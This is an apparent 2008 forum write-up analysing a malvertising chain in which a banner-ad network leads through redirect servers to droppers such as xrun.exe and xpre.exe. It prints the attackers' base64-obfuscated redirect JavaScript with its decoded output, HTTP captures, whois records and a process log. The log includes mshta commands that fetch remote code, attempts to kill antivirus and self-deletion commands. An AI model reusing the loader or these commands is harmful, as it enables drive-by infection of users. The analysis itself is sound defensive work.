Kimberly
xrun.exe was reported to have been seen on ebaumworld.com, but unfortunately I didn't get the file while visiting the website. I got curious because you usually get that file on crack sites. After starting up my VM, I headed to a well-known crack site. Surprise, surprise: it's triggered by an advertising banner, so you might run into this one on many different websites — the malicious content comes from the ad chain, not from the site you are visiting.

We will see later on that xrun.exe isn't the only file that gets dropped. I actually got 3 alerts.
IPB Image
IPB Image
IPB Image
Don’t follow the links in the write-up or you will end up with a ton load of malware on your PC.

Tracing back the origin of the file


I worked backwards to find its origin using the Referer headers in the captured packets, but it is far easier to follow if we start from the initial advert and walk forwards.

It all begins with a placeholder for ads.clicksor.com adverts.
hxxp://ads.clicksor.com/serving/flash/160x600.swf – Nothing special because it’s simply a black placeholder for random adverts.

IPB Image
Once decompressed, we can decompile the SWF with Flare. Inside you can see the following function, which displays the random banners. Note that the SWF itself is not malicious: it simply passes its parameters to getURL()/loadClip() without any check, so whatever it is told to load gets shown.

CODE
// Decompiled (Flare) from the clicksor 160x600 placeholder SWF. Decides how one
// banner is rendered from the parameters it is handed. Where those parameters
// come from (FlashVars from the embedding page?) is not visible here — confirm.
// Security note: `url` and `cdata` are used exactly as received (no scheme or
// host check), so whoever controls the parameters controls both the navigation
// target and the clip that gets loaded into the page.
function displayBannerAd(cid, kid, nid, pnid, url, cdata, mtype, cpx, adWidth, adHeight, adType, bannerID, pid, sid, ch, uid) {
      // Sentinel campaign/keyword ids: no ad at all, just send the current
      // window to `url`.
      if (cid == '-1' && kid == '-1') {
        getURL(url, '_self');
        return undefined;
      } else {
        // "rich" CPM/CPA ads are not rendered in Flash: the whole window is sent
        // to showRichAd.php, which (see the HTTP trace that follows) answers
        // with an iframe of HTML chosen by the advertiser.
        if ((cpx == 'cpm' || cpx == 'cpa') && mtype == 'rich') {
          // `pnid` is spliced straight into the host name and every other value
          // is concatenated unescaped (the captured request shows `ch=undefined`,
          // i.e. missing parameters are not guarded). A crafted `pnid` such as
          // ".example/?" would change the target host — only an issue if `pnid`
          // can be attacker-controlled, which cannot be determined from here.
          getURL('http://ads' + ((pnid != 1) ? pnid : '') + '.clicksor.com/serving/showRichAd.php?cid=' + cid + '&kid=' + kid + '&nid=' + nid + '&mtype=' + mtype + '&cpx=' + cpx + '&adType=' + adType + '&bannerID=' + bannerID + '&pid=' + pid + '&sid=' + sid + '&ch=' + ch + '&uid=' + uid, '_self');
          return undefined;
        } else {
          // Image/SWF creative: load `cdata` into a fresh clip on top of
          // everything else and make a click on it open `url` in a new window.
          var container = createEmptyMovieClip('container', getNextHighestDepth());
          var v2 = new MovieClipLoader();
          // NOTE(review): MovieClipLoader dispatches `onLoadInit` (capital L).
          // The decompiled name is `onloadInit`; if the SWF targets a
          // case-sensitive player this handler would never fire, so it may be a
          // decompiler artifact — verify against the raw bytecode.
          this.onloadInit = function (mc) {
            mc.onRelease = function () {
              getURL(url, '_blank');
            };

            // Size is taken from the parameters, not from the loaded content.
            container._width = adWidth;
            container._height = adHeight;
          };

          v2.addListener(this);
          v2.loadClip(cdata, container);
        }
      }
    }

showRichAd.php is called with several arguments; they determine the advertisement that needs to be displayed. Note that the response below is not an image but a 207-byte HTML page containing an iframe to creative.clicksor.com — a "rich" ad is arbitrary HTML chosen by the advertiser, which is what makes the rest of this chain possible.

CODE
GET /serving/showRichAd.php?cid=46821&kid=3605363&nid=1&mtype=rich&cpx=cpm&adType=5&bannerID=55706&pid=61989&sid=124442&ch=undefined&uid=1024551843 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ads.clicksor.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 04 Mar 2008 15:03:33 GMT
Server: Apache/2.2.3 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: CLICKSORUID=1204643013952; expires=Thu, 03-Apr-2008 15:03:33 GMT; path=/; domain=.clicksor.com
Content-Length: 207
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML><BODY leftmargin=0 topmargin=0><iframe src="http://creative.clicksor.com/46821/c1032706034.html" FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO width="160" height="600"></iframe></BODY></HTML>

CODE
GET /46821/c1032706034.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ads.clicksor.com/serving/showRichAd.php?cid=46821&kid=3605363&nid=1&mtype=rich&cpx=cpm&adType=5&bannerID=55706&pid=61989&sid=124442&ch=undefined&uid=1024551843
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: creative.clicksor.com
Connection: Keep-Alive
Cookie: CLICKSORUID=1204643013952
HTTP/1.1 200 OK
Date: Tue, 04 Mar 2008 15:03:34 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Mon, 25 Sep 2006 14:19:20 GMT
ETag: "df51f1-111-e0362a00"
Accept-Ranges: bytes
Content-Length: 273
Connection: close
Content-Type: text/html; charset=UTF-8
<html><head><title>AD</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head><body topmargin="0" leftmargin="0">
........<script language="javascript" src="http://especialads.com/banner/serve.php?sv=160x600"></script>
........</body></html>

CODE
GET /banner/serve.php?sv=160x600 HTTP/1.1
Accept: */*
Referer: http://creative.clicksor.com/46821/c1032706034.html
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: especialads.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 04 Mar 2008 15:03:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Expires: Mon, 01 Jul 2000 01:00:00 GMT
Pragma: no-cache
P3P: href="http://especialads.com/w3c/p3p.xml", CP="ad policy", policyref="http://especialads.com/w3c/p3p.xml"
Content-Length: 945
Connection: close
Content-Type: text/html; charset=UTF-8
// Body of the especialads.com serve.php response, as captured. `awefjwefo` is
// the standard base64 alphabet and `waofls` is a plain hand-rolled base64
// decoder (4 input chars -> 3 bytes; the charCodeAt(...) == 61 checks strip
// '=' padding), so the payload is merely encoded, not encrypted.
var awefjwefo = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
function waofls(odkqwp) { var bits; var wqodfkpa = ''; var i = 0; for(; i<odkqwp.length; i += 4) { bits = (awefjwefo.indexOf(odkqwp.charAt(i)) & 0xff) <<18 | (awefjwefo.indexOf(odkqwp.charAt(i +1)) & 0xff) <<12 | (awefjwefo.indexOf(odkqwp.charAt(i +2)) & 0xff) << 6 | awefjwefo.indexOf(odkqwp.charAt(i +3)) & 0xff; wqodfkpa += String.fromCharCode((bits & 0xff0000) >>16, (bits & 0xff00) >>8, bits & 0xff); } if(odkqwp.charCodeAt(i -2) == 61) { return(wqodfkpa.substring(0, wqodfkpa.length -2)); } else if(odkqwp.charCodeAt(i -1) == 61) { return(wqodfkpa.substring(0, wqodfkpa.length -1)); } else {return(wqodfkpa)};}
// The decoded text is injected with document.write; it is the redirect script
// shown decoded just below. `unescape` is a no-op here (no %xx sequences in
// base64). NOTE(review): the literal is shown wrapped over two lines and with a
// space after the opening quote — almost certainly forum line-wrapping
// artifacts (a space is not in the alphabet and would shift every following
// byte), so strip them before re-running the decoder.
document.write(waofls(unescape(' DQo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4NCmRvY3VtZW50LmxvY2F0aW9uLmhyZWYgPSAi
aHR0cDovL2VzcGVjaWFsYWRzLmNvbS9iYW5uZXIvc2hvdy5waHA/Y2lkPTExMzI0MjYmdGlkPTQ1MDExMDEzOTUmc3Y9MTYweDYwMCI7DQo8L3NjcmlwdD4NCg0K')));

Once decoded (this is plain base64 run through a hand-rolled decoder, not encryption), the code above gives us the next location:

CODE
<script language="javascript">
// Navigates the document that included serve.php — the creative.clicksor.com
// iframe from the previous step, not the top-level page — to show.php on the
// same host, carrying the campaign/tracking ids in the query string.
document.location.href = "http://especialads.com/banner/show.php?cid=1132426&tid=4501101395&sv=160x600";
</script>

CODE
GET /banner/show.php?cid=1132426&tid=4501101395&sv=160x600 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ads.clicksor.com/serving/showRichAd.php?cid=46821&kid=3605363&nid=1&mtype=rich&cpx=cpm&adType=5&bannerID=55706&pid=61989&sid=124442&ch=undefined&uid=1024551843
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: especialads.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 04 Mar 2008 15:03:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Expires: Mon, 01 Jul 2000 01:00:00 GMT
Pragma: no-cache
P3P: href="http://especialads.com/w3c/p3p.xml", CP="ad policy", policyref="http://especialads.com/w3c/p3p.xml"
Set-Cookie: ebannsetc=1204643014; expires=Tue, 25-Mar-2008 15:03:34 GMT
Content-Length: 1484
Connection: close
Content-Type: text/html; charset=UTF-8
<script language="javascript">
// show.php response: the same base64 alphabet and decoder as the serve.php
// response above; only the encoded payload differs.
var awefjwefo = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
function waofls(odkqwp) { var bits; var wqodfkpa = ''; var i = 0; for(; i<odkqwp.length; i += 4) { bits = (awefjwefo.indexOf(odkqwp.charAt(i)) & 0xff) <<18 | (awefjwefo.indexOf(odkqwp.charAt(i +1)) & 0xff) <<12 | (awefjwefo.indexOf(odkqwp.charAt(i +2)) & 0xff) << 6 | awefjwefo.indexOf(odkqwp.charAt(i +3)) & 0xff; wqodfkpa += String.fromCharCode((bits & 0xff0000) >>16, (bits & 0xff00) >>8, bits & 0xff); } if(odkqwp.charCodeAt(i -2) == 61) { return(wqodfkpa.substring(0, wqodfkpa.length -2)); } else if(odkqwp.charCodeAt(i -1) == 61) { return(wqodfkpa.substring(0, wqodfkpa.length -1)); } else {return(wqodfkpa)};}
// Decodes to the HTML shown below: a genuine-looking linksynergy affiliate
// banner plus a <script src> pointing at www.awofkwy.net, which is the real
// payload. NOTE(review): the line breaks and the stray space inside
// "c2hvdz8 aWQ9" are forum wrapping artifacts — remove them before decoding,
// since a space is not in the alphabet and would corrupt the output.
document.write(waofls(unescape(' DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPiBib2R5IHsgbWFyZ2luLWxlZnQ6IDBweDsgbWFyZ2luLXRv
cDogMHB4OyBtYXJnaW4tcmlnaHQ6IDBweDsgbWFyZ2luLWJvdHRvbTogMHB4OyB9IDwvc3R5bGU+PGJv
ZHkgc2Nyb2xsPSJubyI+DQoNCjxhIGhyZWY9Imh0dHA6Ly9jbGljay5saW5rc3luZXJneS5jb20vZnMt
YmluL2NsaWNrP2lkPU9neGNKMDdHZnEwJm9mZmVyaWQ9MTEyOTYzLjEwMDAwMDA3JnN1YmlkPTAmdHlw
ZT00IiB0YXJnZXQ9Il9ibGFuayI+PElNRyBib3JkZXI9IjAiIGFsdD0iOHg4LCBJbmMuIiBzcmM9Imh0
dHA6Ly9hZC5saW5rc3luZXJneS5jb20vZnMtYmluL3Nob3c/ aWQ9T2d4Y0owN0dmcTAmYmlkcz0xMTI5NjMuMTAwMDAwMDcmc3ViaWQ9MCZ0eXBlPTQmZ3JpZG51bT05
Ij48L2E+DQoNCg0KDQoNCg0KPHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCIgc3JjPSJodHRwOi8v
d3d3LmF3b2Zrd3kubmV0L3BsYWNlaG9sZGVyLTEzNTQ1MDAtMTkyOTA0NDQxOCI+PC9zY3JpcHQ+DQoN
Cg0KDQoNCg0K')));
</script>

Decoded:

CODE
<style type="text/css"> body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } </style><body scroll="no">
<a href="http://click.linksynergy.com/fs-bin/click?id=OgxcJ07Gfq0&offerid=112963.10000007&subid=0&type=4" target="_blank"><IMG border="0" alt="8x8, Inc." src="http://ad.linksynergy.com/fs-bin/show?id=OgxcJ07Gfq0&bids=112963.10000007&subid=0&type=4&gridnum=9"></a>
<script language="javascript" src="http://www.awofkwy.net/placeholder-1354500-1929044418"></script>

The ad.linksynergy.com link will show us the advert image (see below), so the visitor sees a normal-looking banner; right now we are only interested in the www.awofkwy.net/placeholder-1354500-1929044418 script, which is loaded silently next to it. From here on I will only post screenshots of the code to avoid trouble.

IPB Image

Decoded:

IPB Image

First iframe ...

IPB Image

There are still encoded parts - see the unescape() calls in the text - they are references to the ADODB.Stream ActiveX control (most likely what the original "ADOBE.Stream" refers to; the screenshots are not reproduced here), the control typically abused from Internet Explorer to write a downloaded file to disk. The most interesting part is the 2 links to our malware files.

IPB Image

The second iframe ...

IPB Image

The script is rather long, so I took only a snippet. We find mshta and srun.php again here (both also show up in the Process Guard log in the follow-up post). At the bottom, again, links to xrun.exe and xpre.exe.

IPB Image

Third iframe ...

IPB Image

Java exploit ... the code is very long, so I will only post 2 snippets that show the links.

IPB Image

Advertising image:

IPB Image

especialads.com - 83.216.217.242


ICANN Registrar: ENOM, INC.
Created: 2006-07-16
Expires: 2008-07-16

Name Server: DNS1.NAME-SERVICES.COM (has 4,321,272 domains)
Name Server: DNS2.NAME-SERVICES.COM
Name Server: DNS3.NAME-SERVICES.COM
Name Server: DNS4.NAME-SERVICES.COM
Name Server: DNS5.NAME-SERVICES.COM
Whois Server: whois.enom.com

Server Type: Apache/2.2.3 (CentOS)
IP Location - Niederosterreich - Baden - Colobase Customer Allocation

Registration Service Provided By: Namealerts, LLC
Contact:
Visit: http://www.Namealerts.com

Domain name: especialads.com

Registrant Contact:

Marcel Heler ()
436641774176
Fax: 436641774176
Braeuhausgasse 31/31
Vienna, 1050
AT

Administrative Contact:

Marcel Heler ()
436641774176
Fax: 436641774176
Braeuhausgasse 31/31
Vienna, 1050
AT

Technical Contact:

Marcel Heler ()
436641774176
Fax: 436641774176
Braeuhausgasse 31/31
Vienna, 1050
AT

Status: Locked

Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

Creation date: 16 Jul 2006 19:39:22
Expiration date: 16 Jul 2008 19:39:22

Related domains returned by the same lookup (awofkwy.net, adxanet.net and snipenet.net all appear in this infection chain and in the execution log below):
  1. Adoutfer.net
  2. Adpopserve.net
  3. Adpopshow.net
  4. Adpopups.net
  5. Adxanet.net
  6. Adxrnet.net
  7. Awofkwy.net
  8. Especialads.com
  9. Iefjios.net
  10. Kasdfps.net
  11. Kiafjwo.net
  12. Netaddirect.com
  13. Netcrefer.net
  14. Netcshow.net
  15. Netsdir.net
  16. Snipenet.net
  17. Snipernet.biz
  18. Snipernet.us
  19. Sxload.net
  20. Xpseek.net
Kimberly
QUOTE(Kimberly @ Mar 4 2008, 08:21 PM) *
Don’t follow the links in the write-up or you will end up with a ton load of malware on your PC.
Speaking of junk .... here is the Process Guard execution log from the VM. Worth noting: xpre.exe immediately tries to terminate Symantec's ccApp.exe and ProcessGuard itself (both blocked), mshta.exe is used to pull srun.php from adxanet.net, xrun.exe then chains further droppers via "cmd /c start", and the droppers remove themselves with the usual "ping localhost -n 3 && del" delay trick.
QUOTE
---Process Guard Log Started---

Thu 06 - 22:31:59 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xrun.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xrun.exe" ]
Thu 06 - 22:32:19 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:32:20 [TERMINATE] c:\docume~1\kly\locals~1\temp\xpre.exe [288] was blocked from terminating c:\program files\common files\symantec shared\ccapp.exe [428]
Thu 06 - 22:32:20 [TERMINATE] c:\docume~1\kly\locals~1\temp\xpre.exe [288] was blocked from terminating c:\program files\processguard\procguard.exe [872]
Thu 06 - 22:32:57 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\windows\system32\mshta.exe" hxxp://adxanet.net/code/srun.php ]
Thu 06 - 22:33:22 [EXECUTION] "c:\windows\system32\dllhost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [616]
[EXECUTION] Commandline - [ c:\windows\system32\dllhost.exe /processid:{02d4b3f1-fd88-11d1-960d-00805fc79235} ]
Thu 06 - 22:33:29 [EXECUTION] "c:\windows\system32\msdtc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [616]
[EXECUTION] Commandline - [ c:\windows\system32\msdtc.exe ]
Thu 06 - 22:33:40 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\windows\system32\mshta.exe" hxxp://adxanet.net/code/srun.php ]
Thu 06 - 22:33:44 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\windows\system32\mshta.exe" hxxp://adxanet.net/code/srun.php ]
Thu 06 - 22:37:53 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\xpre.exe" ]
Thu 06 - 22:38:08 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\snapsnet.exe" ]
Thu 06 - 22:38:14 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1104]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:38:16 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1280]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" ]
Thu 06 - 22:38:47 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\rasesnet.exe" ]
Thu 06 - 22:38:50 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3728]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:38:57 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3744]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:39:08 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\wavvsnet.exe" ]
Thu 06 - 22:39:12 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3312]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:39:35 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3340]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:39:50 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1916]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:40:15 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\yazzsnet.exe" ]
Thu 06 - 22:40:18 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1484]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:40:22 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [220]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:40:27 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:40:31 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:40:33 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:40:39 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xrun.exe" >> nul ]
Thu 06 - 22:41:16 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2516]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:41:40 [EXECUTION] "c:\temp\txnog4220.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\idlo01\idlo011065.exe" [2252]
[EXECUTION] Commandline - [ c:\temp\txnog4220.exe ]
Thu 06 - 22:41:43 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:41:47 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3292]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:41:50 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:41:52 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1216]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:41:59 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:42:01 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2816]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:42:03 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3040]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:42:06 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ mshta hxxp://adxanet.net/code/srun.php ]
Thu 06 - 22:43:08 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" [1248]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:43:21 [EXECUTION] "c:\windows\17pholmes572.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" [2640]
[EXECUTION] Commandline - [ "c:\windows\17pholmes572.exe" 61a847b5bbf728173599284503996897c881250221c8670836ac4fa7c8833201749139 ]
Thu 06 - 22:44:02 [EXECUTION] "c:\windows\system32\ev4\philcom3.exe" was allowed to run
[EXECUTION] Started by "c:\temp\txnog4220.exe" [3112]
[EXECUTION] Commandline - [ c:\windows\system32\ev4\philcom3.exe ]
Thu 06 - 22:44:07 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2332]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:44:08 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3852]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:44:10 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1104]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:44:11 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1256]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:44:14 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3940]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:44:15 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [2268]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:44:35 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ mshta hxxp://snipenet.net/ads/winfix.php ]
Thu 06 - 22:45:00 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml2.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [3320]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml2.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:45:08 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:45:10 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:45:12 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:45:22 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" [2640]
[EXECUTION] Commandline - [ cmd /c ""c:\docume~1\kly\locals~1\temp\un.bat" " ]
Thu 06 - 22:45:28 [EXECUTION] "c:\windows\system32\fb3\rvdll36.exe" was allowed to run
[EXECUTION] Started by "c:\temp\txnog4220.exe" [3112]
[EXECUTION] Commandline - [ c:\windows\system32\fb3\rvdll36.exe ]
